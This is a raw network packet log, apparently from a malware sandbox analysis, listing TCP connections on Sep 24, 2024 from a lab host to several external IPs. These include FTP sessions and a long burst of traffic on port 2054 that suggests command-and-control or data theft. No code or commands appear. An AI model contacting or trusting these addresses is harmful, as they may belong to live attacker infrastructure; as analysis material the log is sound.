                                                            Sep 24, 2024 23:42:05.375293970 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:05.598150015 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:05.601114988 CEST4970560973192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:05.606034040 CEST6097349705191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:05.606122971 CEST4970560973192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:05.606169939 CEST4970421192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:05.611268997 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:05.841496944 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:05.884795904 CEST4970421192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:06.241117954 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:06.245980978 CEST6097349705191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:06.246448040 CEST6097349705191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:06.246529102 CEST4970560973192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:06.247313023 CEST4970560973192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:06.252091885 CEST6097349705191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:06.272394896 CEST49706443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:06.272433043 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:06.272528887 CEST49706443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:06.279454947 CEST49706443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:06.279473066 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:06.290997028 CEST4970421192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:06.766532898 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:06.766690969 CEST49706443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:06.771097898 CEST49706443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:06.771106005 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:06.771462917 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:06.800879002 CEST49706443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:06.847409010 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:07.064575911 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:07.065390110 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:07.065469980 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:07.065493107 CEST49706443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:07.065514088 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:07.065581083 CEST49706443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:07.065834999 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:07.065937042 CEST49706443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:07.070286036 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:07.070328951 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:07.070363045 CEST49706443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:07.070374012 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:07.070389986 CEST49706443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:07.119138002 CEST49706443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:07.152430058 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:07.152585030 CEST49706443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:07.153331041 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:07.153338909 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:07.153415918 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:07.153424025 CEST49706443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:07.153455019 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:07.153513908 CEST49706443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:07.153548002 CEST49706443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:07.153553963 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:07.153707981 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:07.153769016 CEST49706443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:07.153776884 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:07.153835058 CEST49706443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:07.153872967 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:07.153954029 CEST49706443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:07.153961897 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:07.153975010 CEST4434970676.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:07.154014111 CEST49706443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:07.154050112 CEST49706443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:07.156100988 CEST49706443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:08.558604956 CEST4970421192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:08.563436031 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:08.779620886 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:08.780205965 CEST4970760340192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:08.785049915 CEST6034049707191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:08.785140991 CEST4970760340192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:08.785200119 CEST4970421192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:08.790011883 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:09.006505966 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:09.056598902 CEST4970421192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:09.400640965 CEST6034049707191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:09.400787115 CEST6034049707191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:09.400866985 CEST4970760340192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:09.400902987 CEST4970760340192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:09.401283979 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:09.401838064 CEST49708443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:09.401880980 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:09.402028084 CEST49708443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:09.402282000 CEST49708443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:09.402292967 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:09.406677961 CEST6034049707191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:09.447222948 CEST4970421192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:09.891869068 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:09.893852949 CEST49708443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:09.893878937 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.278565884 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.279014111 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.279098034 CEST49708443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:10.279119968 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.279148102 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.279294014 CEST49708443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:10.280000925 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.280072927 CEST49708443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:10.283780098 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.283862114 CEST49708443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:10.367641926 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.367729902 CEST49708443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:10.367748022 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.367774010 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.367855072 CEST49708443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:10.367860079 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.368768930 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.368824005 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.368858099 CEST49708443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:10.368865013 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.368889093 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.368906021 CEST49708443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:10.368927002 CEST49708443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:10.368932009 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.368943930 CEST49708443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:10.456087112 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.456134081 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.456166029 CEST49708443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:10.456167936 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.456195116 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.456229925 CEST49708443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:10.456729889 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.456785917 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.456787109 CEST49708443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:10.456794977 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.456846952 CEST49708443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:10.456855059 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.456896067 CEST4434970876.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:10.456897020 CEST49708443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:10.456943989 CEST49708443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:10.457201004 CEST49708443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:12.080056906 CEST4970421192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:12.084990025 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:12.301886082 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:12.302304029 CEST4971060326192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:12.307535887 CEST6032649710191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:12.307641029 CEST4971060326192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:12.307770967 CEST4970421192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:12.313294888 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:12.532241106 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:12.619153976 CEST4970421192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:12.946691990 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:12.949858904 CEST6032649710191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:12.950594902 CEST6032649710191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:12.950684071 CEST4971060326192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:12.953346014 CEST4971060326192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:12.953974962 CEST49711443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:12.954016924 CEST4434971176.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:12.954093933 CEST49711443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:12.954849958 CEST49711443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:12.954865932 CEST4434971176.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:12.958178997 CEST6032649710191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:13.009807110 CEST4970421192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:13.450629950 CEST4434971176.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:13.465542078 CEST49711443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:13.465584993 CEST4434971176.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:13.919424057 CEST4434971176.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:13.919524908 CEST4434971176.76.21.22192.168.2.5
                                                            Sep 24, 2024 23:42:13.919580936 CEST49711443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:13.920062065 CEST49711443192.168.2.576.76.21.22
                                                            Sep 24, 2024 23:42:14.192816019 CEST4970421192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:15.539864063 CEST49712443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:15.539926052 CEST44349712104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:15.540009022 CEST49712443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:15.545692921 CEST49712443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:15.545715094 CEST44349712104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:16.018513918 CEST44349712104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:16.018599033 CEST49712443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:16.020313025 CEST49712443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:16.020327091 CEST44349712104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:16.020565987 CEST44349712104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:16.026165962 CEST49712443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:16.071399927 CEST44349712104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:16.539891958 CEST44349712104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:16.540000916 CEST44349712104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:16.540061951 CEST49712443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:16.541660070 CEST49712443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:24.031769991 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:42:24.036643982 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:42:24.036744118 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:42:24.538050890 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:42:24.542913914 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:42:24.543018103 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:42:24.547873974 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:42:24.800944090 CEST56146443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:24.800962925 CEST44356146104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:24.801044941 CEST56146443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:24.803309917 CEST56146443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:24.803322077 CEST44356146104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:25.279840946 CEST44356146104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:25.279930115 CEST56146443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:25.281259060 CEST56146443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:25.281266928 CEST44356146104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:25.281706095 CEST44356146104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:25.291604042 CEST56146443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:25.339411974 CEST44356146104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:25.430515051 CEST44356146104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:25.430603027 CEST44356146104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:25.430810928 CEST56146443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:25.431807995 CEST56146443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:30.780426025 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:42:30.785229921 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:42:31.694470882 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:42:31.696717978 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:42:31.701565027 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:42:32.858988047 CEST56147443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:32.859076023 CEST44356147104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:32.859159946 CEST56147443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:32.861761093 CEST56147443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:32.861788988 CEST44356147104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:33.613188982 CEST44356147104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:33.613272905 CEST56147443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:33.617511988 CEST56147443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:33.617523909 CEST44356147104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:33.617916107 CEST44356147104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:33.642138004 CEST56147443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:33.687396049 CEST44356147104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:33.769119024 CEST44356147104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:33.769284964 CEST44356147104.20.4.235192.168.2.5
                                                            Sep 24, 2024 23:42:33.769335032 CEST56147443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:33.770221949 CEST56147443192.168.2.5104.20.4.235
                                                            Sep 24, 2024 23:42:49.289657116 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:42:49.290848970 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:42:49.295723915 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:07.351016045 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:07.351552963 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:07.356327057 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:09.694623947 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:09.744151115 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:09.823179960 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:09.828161001 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:13.154256105 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:13.197402000 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:13.222752094 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:13.227555990 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:16.754113913 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:16.806658983 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:16.816363096 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:16.821366072 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:19.964020014 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:20.009721041 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:20.048232079 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:20.053231001 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:20.415585041 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:20.420409918 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:21.823270082 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:21.828053951 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:22.918345928 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:22.955511093 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:22.960407019 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:25.451718092 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:25.452059031 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:25.462601900 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:26.275660992 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:26.280512094 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:26.448004007 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:26.452785969 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:26.998826027 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:27.033977985 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:27.038840055 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:27.447592974 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:27.452725887 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:27.572535992 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:27.577325106 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:27.874346018 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:27.879215956 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:27.879287004 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:27.884176016 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:27.884284019 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:27.889031887 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:27.890573978 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:27.895365000 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:27.895423889 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:27.900154114 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:27.900264978 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:27.905076981 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:27.905133009 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:27.909931898 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:27.909984112 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:27.914788008 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:27.917728901 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:27.922460079 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:27.922522068 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:27.927401066 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:27.938040972 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:27.943680048 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.006778955 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.011714935 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.078828096 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.083651066 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.083729029 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.088562965 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.089272022 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.094707966 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.094773054 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.102550030 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.102648020 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.107579947 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.107698917 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.112521887 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.112674952 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.118165016 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.118220091 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.124033928 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.125430107 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.130496979 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.130614996 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.135399103 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.135571957 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.140491962 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.141947031 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.146888018 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.146950960 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.151786089 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.151854992 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.156625986 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.156685114 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.161470890 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.162693024 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.167632103 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.167715073 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.172522068 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.189826012 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.194653034 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.194890976 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.199661016 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.199733973 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.204554081 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.204631090 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.209403038 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.209477901 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.214329004 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.215308905 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.220088959 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.220170975 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:28.225024939 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:28.225084066 CEST561452054192.168.2.546.246.14.5
